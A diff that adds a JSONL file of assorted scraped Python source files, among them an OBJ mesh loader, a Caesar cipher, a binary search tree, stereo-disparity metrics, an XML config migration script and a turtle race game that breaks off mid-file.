diff --git "a/4067.jsonl" "b/4067.jsonl" new file mode 100644--- /dev/null +++ "b/4067.jsonl" @@ -0,0 +1,663 @@ +{"seq_id":"186720677","text":"# -*- coding: utf-8 -*-\nimport numpy as np\n\n\nclass Model:\n def __init__(self, filename):\n vertices = []\n faces = []\n texcoords = []\n texfaces = []\n with open(filename) as fp:\n for line in fp:\n if line.startswith('#'):\n continue\n values = line.split()\n if not values:\n continue\n if values[0] == 'v':\n v = [float(val) for val in values[1:]]\n vertices.append(v)\n elif values[0] == 'vt':\n vt = [float(values[1]), float(values[2])]\n texcoords.append(vt)\n elif values[0] == 'f':\n face = []\n texface = []\n for v in values[1:]:\n w = v.split('/')\n face.append(int(w[0])-1)\n texface.append(int(w[1])-1)\n faces.append(face)\n texfaces.append(texface)\n\n print(\"\\nObj file read:\\n\", \"-\" * 29, sep='')\n print(\"#v\", \"#f\", \"#vt\", \"#ft\", sep='\\t\\t')\n print(len(vertices), len(faces), len(texcoords), len(texfaces), sep='\\t')\n print(\"-\" * 29 + '\\n')\n\n self.vertices = np.array(vertices)\n self.faces = np.array(faces, dtype=np.uint32)\n self.texcoords = np.array(texcoords)\n self.texfaces = np.array(texfaces, dtype=np.uint32)\n","sub_path":"model.py","file_name":"model.py","file_ext":"py","file_size_in_byte":1479,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"48"} +{"seq_id":"589110834","text":"from setuptools import find_packages\nfrom setuptools import setup\nimport os\n\nVERSION='0.0.4'\n\n\nsetup(\n description='Plone.org theme',\n entry_points={\n 'z3c.autoinclude.plugin': 'target = plone', \n },\n include_package_data=True,\n install_requires=[\n 'setuptools',\n ],\n long_description=(\n open('README.rst').read() +\n open(os.path.join('docs', 'HISTORY.txt')).read()\n ),\n name='plonetheme.ploneorg',\n namespace_packages=[\n 'plonetheme',\n ],\n packages=find_packages(),\n version=VERSION,\n)\n","sub_path":"setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":561,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"48"} +{"seq_id":"91665283","text":"alpha = 'абвгдеёжзийклмнопрстуфхцчшщъыьэюя'\r\nalphaUp = 'АБВГДЕЁЖЗИЙКЛМНОПРСТУФХЦЧШЩЪЫЬЭЮЯ'\r\nnumber = int(input('Введите число Цезяря: '))\r\nsummary = ''\r\n\r\ndef changeChar(char):\r\n if char in alpha:\r\n return alpha[(alpha.index(char) + number) % len(alpha)]\r\n elif char in alphaUp:\r\n return alphaUp[(alphaUp.index(char) + number) % len(alphaUp)]\r\n else:\r\n return char\r\n\r\nwith open('filename.txt', encoding='utf8') as myFile:\r\n for line in myFile:\r\n for char in line:\r\n summary += changeChar(char)\r\n\r\nwith open('output.txt', 'w', encoding='utf8') as myFile:\r\n myFile.write(summary)\r\n","sub_path":"Шифр Цезаря.py","file_name":"Шифр Цезаря.py","file_ext":"py","file_size_in_byte":717,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"48"} +{"seq_id":"609369706","text":"#!/usr/bin/python\r\n# -*- coding: utf-8 -*-\r\nimport sys\r\n# reload(sys)\r\n# sys.setdefaultencoding(\"utf-8\")\r\n\r\nimport os \r\nimport codecs\r\nfrom operator import itemgetter\r\n\r\nimport folderWalk as fw\r\n\r\nclass discourseRelation() :\r\n ''' Discourse Relation class. This class includes all the components of a discourse relation. '''\r\n\r\n def __init__(self, relationType , connSpan , arg1Span , arg2Span , sense) :\r\n ''' Takes Type of the Relation, connective Span, Argument Spans and Sense as input '''\r\n self.relationType = relationType\r\n self.connSpan = connSpan\r\n self.arg1Span = arg1Span\r\n self.arg2Span = arg2Span\r\n self.sense = sense\r\n self.arg1 = None\r\n self.arg2 = None\r\n self.conn = None\r\n self.isPaired = False\r\n self.connTrees = []\r\n self.arg1Trees = []\r\n self.arg2Trees = []\r\n self.arg1Sentence = []\r\n self.arg2Sentence = []\r\n self.fileName = None\r\n \r\n def updateSense(self , sense) :\r\n ''' Update the sense field '''\r\n self.sense = sense\r\n \r\n def updateArg1Span(self , arg1Span) :\r\n ''' Update the span value for Argument-1 '''\r\n self.arg1Span = arg1Span\r\n \r\n def updateArg2Span(self , arg2Span) :\r\n ''' Update the span value for Argument-2 '''\r\n self.arg2Span = arg2Span\r\n \r\n def updateRelationType(self , relationType) :\r\n ''' Update the type of the discourse relation '''\r\n self.relationType = relationType\r\n\r\n def populateRelationText(self,data) :\r\n ''' Takes Raw Text as data and populates the argument-texts from the already stored span values ''' \r\n self.conn = ''\r\n if self.relationType in ['Explicit', 'AltLex'] :\r\n self.conn = seekPrint(data,self.connSpan)\r\n self.arg1 = seekPrint(data,self.arg1Span)\r\n self.arg2 = seekPrint(data,self.arg2Span)\r\n return 1\r\n\r\n def printValue(self) : \r\n ''' Prints the disourse relation with text and tree(s) in the arguments and connective '''\r\n returnString = ''\r\n returnString += 'ARG1 : ' + self.arg1 + '\\n'\r\n returnString += '\\n'.join(tree.printValue(tree.rootNode) for tree in self.arg1Trees)\r\n returnString += 'ARG2 : ' + self.arg2 + '\\n'\r\n returnString += '\\n'.join(tree.printValue(tree.rootNode) for tree in self.arg2Trees)\r\n returnString += 'CONN : ' + self.conn + '\\n'\r\n returnString += '\\n'.join(tree.printValue(tree.rootNode) for tree in self.connTrees)\r\n returnString += '\\n-----------\\n'\r\n return returnString\r\n\r\n\r\ndef seekPrint(data,pos) :\r\n ''' Given Text and PDTB-style offset format, extracts the desired text '''\r\n returnString=''\r\n posList=pos.split(';')\r\n delimiter = ''\r\n for posPart in posList :\r\n [posInit,posFinal]=posPart.split('..')\r\n returnString = returnString + delimiter + data[int(posInit):int(posFinal)]\r\n if len(posList) > 1 :\r\n delimiter = '..'\r\n return returnString\r\n\r\n\r\ndef getPOSList(span) :\r\n ''' Given the PDTB-style offset format, extracts the different discontiguous offset mentions and returns a list of tuple(startPOS,endPOS) for each part ''' \r\n POSList = []\r\n spanList = span.split(';')\r\n for spanPart in spanList :\r\n [startPOS ,endPOS] = spanPart.split('..')\r\n POSList.append((int(startPOS) , int(endPOS)))\r\n return POSList\r\n\r\ndef updateSenseIndex(index, conn , sense) :\r\n ''' Update a 2-level dictionary \"index\" for a particular sense and connective '''\r\n if conn not in index.keys() :\r\n index[conn] = {}\r\n index[conn][sense] = 1\r\n else :\r\n if sense not in index[conn].keys() :\r\n index[conn][sense] = 1\r\n else :\r\n index[conn][sense] += 1\r\n return index\r\n\r\ndef analyseRelation(relation,data) :\r\n ''' Checks the relation for particular characteristics such as adjacency, sentence difference etc. '''\r\n\r\n if relation.connSpan!='' :\r\n return isBetween(relation.connSpan , relation.arg1Span , relation.arg2Span) \r\n\r\ndef processAnnFile( relationList , connTypeCounts , explicitConnDict, implicitConnDict , altlexConnDict, senseDict , connSenseIndex ,annFD,rawFD,type='full') :\r\n print(\"Processing annotation file:\", annFD.name)\r\n ''' Given the annotation file and raw file descriptor, process the ann file and populate the discourse relations '''\r\n\r\n# connTypeCounts = {'Explicit':0 , 'Implicit':0 ,'AltLex':0 , 'EntRel':0 , 'NoRel':0}\r\n# connTypeCounts = [0,0,0,0,0]\r\n# senseDict = {}\r\n# explicitConnDict = {}\r\n# altlexConnDict = {}\r\n# implicitConnDict = {}\r\n# connSenseIndex = {}\r\n\r\n temp = rawFD.read()\r\n# relationList = []\r\n for line in annFD :\r\n fields=line.split('|')\r\n tempDR = discourseRelation(fields[0], fields[1],fields[14],fields[20] , fields[8])\r\n tempDR.fileName = rawFD.name\r\n\r\n if tempDR.sense == '' :\r\n tempDR.sense = '_Without_sense'\r\n \r\n if type=='full' : \r\n\r\n connTypeCounts[tempDR.relationType] += 1\r\n senseDict[tempDR.sense] = senseDict.setdefault(tempDR.sense,0) + 1\r\n\r\n if tempDR.relationType=='Explicit' :\r\n tempDR.conn = seekPrint(temp,tempDR.connSpan)\r\n explicitConnDict[tempDR.conn] = explicitConnDict.setdefault(tempDR.conn,0) + 1\r\n index = updateSenseIndex(connSenseIndex, tempDR.conn , tempDR.sense)\r\n\r\n elif tempDR.relationType=='AltLex' :\r\n tempDR.conn = seekPrint(temp,tempDR.connSpan)\r\n altlexConnDict[tempDR.conn] = altlexConnDict.setdefault(tempDR.conn , 0) + 1\r\n\r\n elif tempDR.relationType=='Implicit' :\r\n tempDR.conn = fields[7]\r\n implicitConnDict[tempDR.conn] = implicitConnDict.setdefault(tempDR.conn , 0 ) + 1\r\n\r\n relationList.append(tempDR)\r\n return [relationList, connTypeCounts, [explicitConnDict , implicitConnDict , altlexConnDict] , senseDict, connSenseIndex]\r\n\r\nif __name__ == '__main__' :\r\n CONNS = list()\r\n # Specify the input directory as first argument\r\n dataPath = sys.argv[1]\r\n annPath = os.path.join(sys.argv[1],'ann')\r\n rawPath = os.path.join(sys.argv[1],'raw')\r\n\r\n # Specify the outputFile-prefix as second argument\r\n# outPath = sys.argv[2]\r\n# outFile = outPath + '.statistics.txt'\r\n# outRelationFile = outPath + '.relationList.txt'\r\n# adjRelationFile = outPath + '.adjRelationList.txt'\r\n\r\n annFileDict = fw.fileListToFileNameDict(fw.folderWalk(annPath))\r\n rawFileDict = fw.fileListToFileNameDict(fw.folderWalk(rawPath))\r\n\r\n # outFD=codecs.open(outFile,'w',encoding='utf-8')\r\n # outRelationFD = codecs.open(outRelationFile,'w',encoding='utf-8')\r\n # adjRelationFD = codecs.open(adjRelationFile,'w',encoding='utf-8')\r\n\r\n \r\n connTypeCounts = {'Explicit':0 , 'Implicit':0 ,'AltLex':0 , 'EntRel':0 , 'NoRel':0}\r\n senseDict = {}\r\n explicitConnDict = {}\r\n altlexConnDict = {}\r\n implicitConnDict = {}\r\n connSenseIndex = {}\r\n relationList=[]\r\n \r\n for inpFile in annFileDict.keys() :\r\n annFD = open(annFileDict[inpFile],'r')\r\n rawFD = codecs.open(rawFileDict[inpFile],'rb',encoding='utf-8')\r\n # outRelationFD.write(annFD.name + '\\n')\r\n [relationList , connTypeCounts, [explicitConnDict , implicitConnDict , altlexConnDict] , senseDict, connSenseIndex ] = processAnnFile( relationList , connTypeCounts , explicitConnDict, implicitConnDict , altlexConnDict, senseDict , connSenseIndex ,annFD , rawFD)\r\n annFD.close()\r\n \r\n G = list()\r\n for dr in relationList:\r\n if dr.relationType == 'Explicit' and dr.conn in CONNS:\r\n G.append((dr.arg1Sentence, dr.arg2Sentence, dr.conn))\r\n\r\n\r\n\r\n # Producing the statistics File \r\n\r\n# outFD.write('Total Connective Frequency :\\n')\r\n# outFD.write( 'Explicit Connectives\\t%d\\nImplicit Connectives\\t%d\\nAltLex\\t%d\\nEntRel\\t%d\\nNoRel\\t%d\\n\\n' % (connTypeCounts['Explicit'] , connTypeCounts['Implicit'] , connTypeCounts['AltLex'] , connTypeCounts['EntRel'] , connTypeCounts['NoRel']))\r\n# outFD.write('Sense Frequency :\\n')\r\n# senseList = sorted(senseDict.items() , key=itemgetter(0))\r\n# outFD.write('\\n'.join(x[0] + '\\t' + str(x[1]) for x in senseList) + '\\n')\r\n# outFD.write('\\nExplicit Connective Frequency :\\n')\r\n\r\n# for conn in explicitConnDict.keys() :\r\n# outFD.write(conn + '\\t' + str(explicitConnDict[conn]) + '\\n')\r\n# outFD.write('\\nAltLex Connective Frequency :\\n')\r\n# for conn in altlexConnDict.keys() :\r\n# outFD.write(conn + '\\t' + str(altlexConnDict[conn]) + '\\n')\r\n# outFD.write('\\nImplicit Connective Frequency :\\n')\r\n# for conn in implicitConnDict.keys() :\r\n# outFD.write(conn + '\\t' + str(implicitConnDict[conn]) + '\\n')\r\n\r\n # Producing the Connective-Sense Mapping Statistics File\r\n\r\n # connSenseFD = codecs.open(outPath + '.mappings.txt' , 'w' , encoding = 'utf-8')\r\n # connMappings = sorted(connSenseIndex.items() , key=itemgetter(1) , reverse=True)\r\n # for conn in connMappings :\r\n # connective = conn[0]\r\n # senses = sorted(conn[1].items() , key=itemgetter(0) , reverse=True)\r\n # connSenseFD.write('Connective : ' + connective + '\\n' + 'Types of Sense : ' + str(len(senses)) + '\\n' + '\\n'.join(('Sense : ' + x[0] + ' - ' + str(x[1])) for x in senses) + '\\n\\n')\r\n \r\n import editdistance\r\n\r\n S = list()\r\n\r\n for conn in CONNS:\r\n total = 0\r\n count = 0\r\n for s1, s2, sc in S:\r\n if sc != conn:\r\n continue\r\n for g1, g2, gc in G:\r\n if gc != conn:\r\n continue\r\n d1 = editdistance.eval(s1, g1) / max(len(s1), len(g1))\r\n d2 = editdistance.eval(s2, g2) / max(len(s2), len(g2))\r\n if min(d1, d2) < 0.7:\r\n total += d1 + d2 \r\n count += 1\r\n \r\n print(\"Average extraction error for \" + conn + \"=\", total / count)","sub_path":"HDTB/extract_relations.py","file_name":"extract_relations.py","file_ext":"py","file_size_in_byte":10273,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"48"} +{"seq_id":"12917980","text":"\n\n#calss header\nclass _MAINSPRING():\n\tdef __init__(self,): \n\t\tself.name = \"MAINSPRING\"\n\t\tself.definitions = [u'the most important reason for something; the thing that makes something else happen: ']\n\n\t\tself.parents = []\n\t\tself.childen = []\n\t\tself.properties = []\n\t\tself.jsondata = {}\n\n\n\t\tself.specie = 'nouns'\n\n\n\tdef run(self, obj1 = [], obj2 = []):\n\t\treturn self.jsondata\n","sub_path":"xai/brain/wordbase/nouns/_mainspring.py","file_name":"_mainspring.py","file_ext":"py","file_size_in_byte":373,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"48"} +{"seq_id":"576601461","text":"\n\nfrom xai.brain.wordbase.verbs._impair import _IMPAIR\n\n#calss header\nclass _IMPAIRING(_IMPAIR, ):\n\tdef __init__(self,): \n\t\t_IMPAIR.__init__(self)\n\t\tself.name = \"IMPAIRING\"\n\t\tself.specie = 'verbs'\n\t\tself.basic = \"impair\"\n\t\tself.jsondata = {}\n","sub_path":"xai/brain/wordbase/verbs/_impairing.py","file_name":"_impairing.py","file_ext":"py","file_size_in_byte":242,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"48"} +{"seq_id":"348168551","text":"from PIL import Image\nimport math\nfrom sklearn.metrics import mean_absolute_error, mean_squared_error\nimport os\nimport numpy as np\nfrom file_utilities import list_directories, write_report\nimport imutils\nimport cv2\nfrom tqdm import tqdm\nfrom utils import *\nfrom CV_stereo_matching.opencv_stereo_matching import StereoMatching\n\n\"\"\"\n data_path --> dir of the dataset\n The folders inside have to be the following structure tree\n main dir\n |--- asw_estimation : disparity estimation\n |--- disp_up: GT disparity\n |--- depth_up: GT depth map\n |--- image_up\n |--- imag_down\n\"\"\"\nreport_name = \"MP3D_StereoMatching_disp_range.csv\"\ndata_path_gt = \"/home/kike/Documents/Dataset/ICCV_dataset/MP3D/test\"\n\n# report_name = \"SF3D_StereoMatching_disp_range.csv\"\n# data_path_gt = \"/home/kike/Documents/Dataset/ICCV_dataset/SF3D/test\"\n\n\ndir_disp_gt = os.path.join(data_path_gt, \"disp_up\")\ndir_depth_gt = os.path.join(data_path_gt, \"depth_up\")\ndir_rgb_map_up = os.path.join(data_path_gt, \"image_up\")\ndir_rgb_map_down = os.path.join(data_path_gt, \"image_down\")\n\nlist_disp_gt = list_directories(dir_disp_gt)\nlist_depth_gt = list_directories(dir_depth_gt)\nlist_rgb_map_up = list_directories(dir_rgb_map_up)\nlist_rgb_map_down = list_directories(dir_rgb_map_down)\n\nglobal_disp_range_1 = 0\nglobal_disp_range_2 = 0\nglobal_disp_range_3 = 0\n\nreport = []\nstereo = StereoMatching()\n\ntbar = tqdm(total=len(list_disp_gt))\nfor i in range(len(list_disp_gt)):\n disp_gt = np.load(os.path.join(dir_disp_gt, list_disp_gt[i]))\n\n mask_range = disp_gt > 67.5\n disp_gt[mask_range] = 0\n\n rgb_map_up = cv2.imread(os.path.join(dir_rgb_map_up, list_rgb_map_up[i]))\n rgb_map_down = cv2.imread(os.path.join(dir_rgb_map_down, list_rgb_map_down[i]))\n\n imgL = imutils.rotate_bound(rgb_map_up, 270)\n imgR = imutils.rotate_bound(rgb_map_down, 270)\n disp_est = stereo.run(imgL, imgR) * 180 / 512\n disp_est = imutils.rotate_bound(disp_est, 90)\n\n mask = disp_gt > 0\n disp_est[(mask * (-1) + 1).astype(np.bool)] = 0\n disp_gt[(mask * (-1) + 1).astype(np.bool)] = 0\n\n disp_error = np.abs(disp_gt - disp_est)\n\n disp_range_1 = disp_error >= 0.1\n disp_range_2 = disp_error >= 0.5\n disp_range_3 = disp_error >= 1\n\n global_disp_range_1 += np.count_nonzero(disp_range_1) / (disp_range_1.size)\n global_disp_range_2 += np.count_nonzero(disp_range_2) / (disp_range_2.size)\n global_disp_range_3 += np.count_nonzero(disp_range_3) / (disp_range_3.size)\n\n tbar.update(1)\n\n line = [i, list_disp_gt[i], np.count_nonzero(disp_range_1) / (disp_range_1.size),\n np.count_nonzero(disp_range_2) / (disp_range_2.size),\n np.count_nonzero(disp_range_3) / (disp_range_3.size)]\n write_report(report_name, line)\n\ntbar.close()\n\ntotal_dis_error_range_1 = global_disp_range_1 / len(list_disp_gt)\ntotal_dis_error_range_2 = global_disp_range_2 / len(list_disp_gt)\ntotal_dis_error_range_3 = global_disp_range_3 / len(list_disp_gt)\n\nwrite_report(report_name, [report_name])\nwrite_report(report_name, [\"disp >0.1:\", total_dis_error_range_1])\nwrite_report(report_name, [\"disp >0.5: \", total_dis_error_range_2])\nwrite_report(report_name, [\"disp >1: \", total_dis_error_range_3])\n","sub_path":"StereoMatching/metrics_disparity_errors.py","file_name":"metrics_disparity_errors.py","file_ext":"py","file_size_in_byte":3213,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"48"} +{"seq_id":"129887697","text":"from queue import Queue\n\nclass BinarySearchTree:\n def __init__(self, value):\n self.value = value\n self.left = None\n self.right = None\n\n def depth_first_for_each(self, cb): # O(n)\n \n \"\"\"\n The basic algorithm of Pre-order traversal is to visit the root, traverse the left subtree, then traverse the right subtree.\n Here, we're going to check the left or right, and recursively call the depth_first method, while passing in cb.\n cb is the closure (lambda in Python) that will hold on to the value so it can be used in the test file.\n \"\"\"\n \n # Calling the callback with the current parent\n cb(self.value)\n \n # Traverse the left side\n if self.left is not None:\n self.left.depth_first_for_each(cb)\n \n if self.right is not None:\n self.right.depth_first_for_each(cb)\n \n\n \"\"\"\n Stretch goal\n \n The breadth first search is best implemented using Queue data structure, so I implemented the Queue method in another file and then use it here. In addition, I implemented the Linked List method because Queue uses Linked List in its code.\n Here, we're going to add to the queue, then use a loop to check the situation.\n We're going to store the dequeued item in current_node and check if it's empty or not. If it's empty then it means the queue is empty. If it's not empty, then we're going to hold the its value in a closure (lambda) so it can be used in the test file.\n Then we check if the current_node has any children; if it does, then we add them to the queue.\n \"\"\"\n def breadth_first_for_each(self, cb): # O(n)\n \n queue = Queue()\t# O(1)\n \n queue.enqueue(self)\t# adding self, root\t# O(1)\n \n while True: # O(n)\n \n current_node = queue.dequeue()\t# O(1)\n \n if current_node is None:\n return\n \n cb(current_node.value)\t# O(1)\n \n if current_node.left is not None:\n queue.enqueue(current_node.left)\t# O(1)\n if current_node.right is not None:\n queue.enqueue(current_node.right)\t# O(1)\n\n\n def insert(self, value):\n new_tree = BinarySearchTree(value)\n if (value < self.value):\n if not self.left:\n self.left = new_tree\n else:\n self.left.insert(value)\n elif value >= self.value:\n if not self.right:\n self.right = new_tree\n else:\n self.right.insert(value)\n\n def contains(self, target):\n if self.value == target:\n return True\n if self.left:\n if self.left.contains(target):\n return True\n if self.right:\n if self.right.contains(target):\n return True\n return False\n\n def get_max(self):\n if not self:\n return None\n max_value = self.value\n current = self\n while current:\n if current.value > max_value:\n max_value = current.value\n current = current.right\n return max_value\n","sub_path":"search/binary_search_tree.py","file_name":"binary_search_tree.py","file_ext":"py","file_size_in_byte":2831,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"48"} +{"seq_id":"532039789","text":"# Day 12\n\nclass Solution(object):\n def combinationSum3(self, k, n):\n \"\"\"\n :type k: int\n :type n: int\n :rtype: List[List[int]]\n \"\"\"\n result = []\n \n def backtrack(combination, remaining, start):\n if len(combination) == k and remaining == 0:\n print(combination)\n result.append(combination[:])\n return\n \n elif remaining < 0 or len(combination) > k:\n return\n \n for i in range(start+1, 10):\n combination.append(i)\n backtrack(combination, remaining - i , i)\n combination.pop()\n \n backtrack([], n, 0)\n \n return result\n","sub_path":"combinationSum3.py","file_name":"combinationSum3.py","file_ext":"py","file_size_in_byte":757,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"48"} +{"seq_id":"569523556","text":"import pymongo\nfrom pymongo.errors import CollectionInvalid\n\nclient = pymongo.MongoClient(\"mongodb://localhost:27017\")\n\n\ndef setup_db(db_name, collection_name):\n if db_name in client.list_database_names():\n print('Database: {} already present'.format(db_name))\n db = client['db_name']\n try:\n db.create_collection(collection_name)\n except CollectionInvalid:\n print('Collection: {} already exists'.format(collection_name))\n else:\n db = client[db_name]\n db.create_collection(collection_name)","sub_path":"app/setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":558,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"48"} +{"seq_id":"618721154","text":"import csv\nfrom _elementtree import Element\n\nimport os\nimport re\nimport sys\nfrom lxml import etree\n#Remove all the unwanted Elements and Transport\n\n\n\ndef removeTrans(trans,partyname):\n\n mftxpath = [\"/IPNET/GatewayGroup\", \"/IPNET/AgentTypeGroup\",\"/IPNET/PasswordPolicyGroup\",\"/IPNET/CertificateGroup\",\"/IPNET/RoleGroup\",\"/IPNET/NameSpaceGroup\",\"/IPNET/ViewGroup\",\"/IPNET/AlertGroup\",\"/IPNET/UserGroup\",\"/IPNET/DocTypeGroup\",\"/IPNET/ReportGroup\",\"/IPNET/SystemVMGroup\"]\n for dmftxpath in mftxpath:\n for dxpath in transrulesfile.xpath(dmftxpath):\n dxpath.getparent().remove(dxpath)\n\n for tlcpx in transrulesfile.xpath(\"/IPNET/CPXGroup/TopLevelCPX\"):\n if (tlcpx.get('party_name')!= partyname):\n tlcpx.getparent().remove(tlcpx)\n for transport in transrulesfile.xpath(\"/IPNET/CPXGroup/TopLevelCPX/TransportInfo/TransportInfoObject[@name!='\"+trans+ \"']\"):\n transport.getparent().remove(transport)\n\n for party in transrulesfile.xpath(\"/IPNET/PartyGroup/TopLevelParty[@name!='\"+partyname+ \"']\"):\n party.getparent().remove(party)\n\n\n#Remove all the unwanted Rules\ndef removeRules(rule):\n for record in transrulesfile.xpath(\"//Rule[@name!='\"+rule+ \"']\"):\n record.getparent().remove(record)\n\n#Remove all the unwanted Services\ndef removeService(service):\n mftxpath = [\"/IPNET/GatewayGroup\", \"/IPNET/AgentTypeGroup\",\"/IPNET/PasswordPolicyGroup\",\"/IPNET/CertificateGroup\",\"/IPNET/RoleGroup\",\"/IPNET/NameSpaceGroup\",\"/IPNET/ViewGroup\",\"/IPNET/AlertGroup\",\"/IPNET/UserGroup\",\"/IPNET/DocTypeGroup\",\"/IPNET/ReportGroup\",\"/IPNET/SystemVMGroup\",\"/IPNET/PartyGroup\",\"/IPNET/CPXGroup/TopLevelCPX/RulesetInfo\"]\n for dmftxpath in mftxpath:\n for dxpath in servicefile.xpath(dmftxpath):\n dxpath.getparent().remove(dxpath)\n for tlcpx in servicefile.xpath(\"/IPNET/CPXGroup/TopLevelCPX\"):\n if (tlcpx.get('party_name')!= \"SYSTEM\"):\n tlcpx.getparent().remove(tlcpx)\n for ser in servicefile.xpath(\"/IPNET/CPXGroup/TopLevelCPX/TransportInfo/TransportInfoObject[@name!='\"+service+ \"']\"):\n ser.getparent().remove(ser)\n\n#Remove all the unwanted Doc Type\ndef removeDoctype(doctype):\n mftxpath = [\"/IPNET/GatewayGroup\", \"/IPNET/AgentTypeGroup\",\"/IPNET/PasswordPolicyGroup\",\"/IPNET/CertificateGroup\",\"/IPNET/RoleGroup\",\"/IPNET/NameSpaceGroup\",\"/IPNET/ViewGroup\",\"/IPNET/AlertGroup\",\"/IPNET/UserGroup\",\"/IPNET/CPXGroup\",\"/IPNET/ReportGroup\",\"/IPNET/SystemVMGroup\",\"/IPNET/PartyGroup\",\"/IPNET/CPXGroup/TopLevelCPX/RulesetInfo\"]\n for dmftxpath in mftxpath:\n for dxpath in docfile.xpath(dmftxpath):\n dxpath.getparent().remove(dxpath)\n for doct in docfile.xpath(\"/IPNET/DocTypeGroup/TopLevelDocType[@name!='\"+doctype+ \"']\"):\n doct.getparent().remove(doct)\n\n#Update Transport values\ndef updateTrans(hostname,loginid,path,filemask):\n ServerName= transrulesfile.xpath(\".//ServerName\")\n login=transrulesfile.xpath(\".//Name\")\n dirpath=transrulesfile.xpath(\".//Path\")\n mask=transrulesfile.xpath(\".//FileSpec\")\n\n if(hostname!=''):\n for sname in ServerName:\n sname.text= hostname\n if(loginid!=''):\n for lid in login:\n lid.text=loginid\n if(path!=''):\n for dpath in dirpath:\n dpath.text=path\n if(filemask!=''):\n for fmask in mask:\n fmask.text=filemask\n\n#Update Service values\ndef updateService(servicename,hostname,loginid,path,filemask):\n ServerName= servicefile.xpath(\".//ServerName\")\n login=servicefile.xpath(\".//Name\")\n dirpath=servicefile.xpath(\".//Path\")\n mask=servicefile.xpath(\".//FileSpec\")\n if(hostname!=''):\n for sname in ServerName:\n sname.text= hostname\n #sname.append(Element('D', {'name': 'error'}))\n if(loginid!=''):\n for lid in login:\n lid.text=loginid\n if(path!=''):\n for dpath in dirpath:\n dpath.text=path\n if(filemask!=''):\n for fmask in mask:\n fmask.text=filemask\n\n\n#Read the Dev config data\nconfdata=sys.argv[1]\nmatch = re.search(\"(.+)/(.+).xml\", confdata)\nif match:\n match = re.search(\"(.+)/(.+).xml\", confdata)\nelse:\n match = re.search(\"(.+)\\\\\\(.+).xml\", confdata)\ntransrulesfile = etree.parse(confdata)\nservicefile= etree.parse(confdata)\ndocfile=etree.parse(confdata)\n\n#Read Parm file\nparmfile=sys.argv[2]\ncsvparmfile = open(parmfile)\ncsv_f = csv.reader(csvparmfile)\nnext(csv_f, None)\nfor row in csv_f:\n if (row[0]!='') :\n removeTrans(row[1],row[0])\n if (row[1]!='') :\n removeRules(row[2])\n if (row[7]!='') :\n removeService(row[7])\n if (row[12]!='') :\n removeDoctype(row[12])\n updateTrans(row[3],row[4],row[5],row[6])\n updateService(row[7],row[8],row[9],row[10],row[11])\n #Write the updated config file\n if not os.path.exists(match.group(1)+\"//\"+row[7]):\n os.makedirs(match.group(1)+\"//\"+row[7])\n filepath = match.group(1)+\"//\"+row[7]+\"//\"\n\n f = open(filepath+row[7]+\"_Trans_Rules.xml\", 'wb+')\n f.write(etree.tostring(transrulesfile, pretty_print=True))\n f = open(filepath+row[7]+\"_Service.xml\", 'wb+')\n f.write(etree.tostring(servicefile, pretty_print=True))\n if (row[12]!='') :\n f = open(filepath+row[7]+\"_Doctype.xml\", 'wb+')\n f.write(etree.tostring(docfile, pretty_print=True))\n","sub_path":"src/migration/migration.py","file_name":"migration.py","file_ext":"py","file_size_in_byte":5333,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"48"} +{"seq_id":"246158533","text":"# TURTLE RACE, the game\r\n\r\nfrom turtle import *\r\nfrom random import randrange\r\nfrom time import perf_counter\r\n\r\nfrom _SETTINGS_ import *\r\nfrom T_BGM import *\r\nfrom T_DrawTracks import *\r\nfrom T_AddTurtles import *\r\nfrom T_MakeMove import *\r\nfrom T_Scoreboard import *\r\n\r\n# Chọn độ dài\r\nl = -1\r\nwhile (l == -1):\r\n l = input('Choose racetrack length (1=short, 2=medium, 3=long): ')\r\n l = int(l)\r\n if (l-1 < 0) or (l-1 > 2): l = -1\r\ntrackLength_Session = trackUnitCount[l-1] * trackUnitLength\r\n\r\n# Phát nhạc nền\r\nPlayBGM()\r\n\r\n# Vẽ đường đua\r\nspeed(0.125)\r\nDrawTracks(trackUnitCount[l-1])\r\n\r\n# Tạo rùa và lấy thứ tự chạy\r\nt = []\r\nt = AddTurtles(t)\r\norder = []\r\nfor i in range(turtleCount): order.append(t[i][1])\r\n\r\n# Đưa rùa vào vị trí xuất phát\r\nfor i in range(turtleCount):\r\n t[order[i]][0].up()\r\n t[order[i]][0].goto(t[order[i]][2])\r\n t[order[i]][0].down()\r\n\r\n# Hàm kiểm tra tất cả con rùa đã hoàn thành cuộc đua chưa\r\n# TEST\r\ndef haveWeWon():\r\n sum = 0;\r\n for i in range(turtleCount): sum += t[i][9]\r\n if sum == turtleCount*raceCount:\r\n return True\r\n else:\r\n return False\r\n\r\n# Set timer cùng lúc\r\nfor i in range(turtleCount): \r\n t[order[i]][8] = perf_counter() # timer()\r\n\r\n# Bắt đầu đua\r\nwhile haveWeWon() == False:\r\n for i in range(turtleCount):\r\n t[order[i]] = MakeMove(t[order[i]], trackLength_Session)\r\n print(str(t[order[i]]) + ' ' + str(t[order[i]][0].distance(t[order[i]][2])))\r\n \r\n# Debug: hiện trạng thái của rùa sau khi kết thúc cuộc đua\r\nfor i in range(turtleCount): print(t[i])\r\n\r\n# Tìm rùa chiến thắng\r\nwinner = 0\r\nminRuntime = t[0][8] # lấy đại con đầu tiên làm chuẩn\r\nfor i in range(turtleCount):\r\n if t[i][8] < minRuntime:\r\n minRuntime = t[i][8]\r\n winner = i\r\nprint('%s has won the game.' % t[winner][3])\r\n\r\n# Vẽ bảng điểm\r\nfor i in range(turtleCount):\r\n t[i][0].clear()\r\nclear()\r\nfor i in range(turtleCount):\r\n t[i][0].up()\r\n t[i][0].goto(t[i][2][0]+2*trackDivPadding, 